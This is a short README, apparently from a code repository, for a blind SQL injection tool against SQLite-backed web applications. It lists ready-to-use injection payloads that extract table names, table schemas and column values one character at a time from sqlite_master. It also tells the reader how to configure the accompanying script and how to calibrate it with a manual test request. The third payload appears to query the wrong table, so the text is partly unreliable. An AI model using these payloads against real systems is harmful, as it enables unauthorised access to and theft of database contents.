Repository files navigation

To retrieve table names from database:
' or UNICODE(SUBSTR((SELECT name FROM sqlite_master WHERE type='table'),{},1)){} {} --

To retrieve table schema:
' or UNICODE(SUBSTR((SELECT sql FROM sqlite_master WHERE tbl_name='$TABLE_NAME'),{},1)){} {} --

To retrieve values inside column:
' or UNICODE(SUBSTR((SELECT $COLUMN_NAME FROM sqlite_master WHERE tbl_name='$TABLE_NAME'),{},1)){} {} --

Replace $TABLE_NAME and $COLUMN_NAME with data that you retrieved from privious query!

To use the script, you have to set varibles according to your request's header, data and response etc.
I marked these lines with comments in main.py!
Make changes at these lines:

Replace "username" string with your request's data as below:

You have to make this request manually to see what is the response:
' or UNICODE(SUBSTR((SELECT name FROM sqlite_master WHERE type='table'),1,1)) < 128 --
And replace "Data Sent!" string according to your manual request's reply: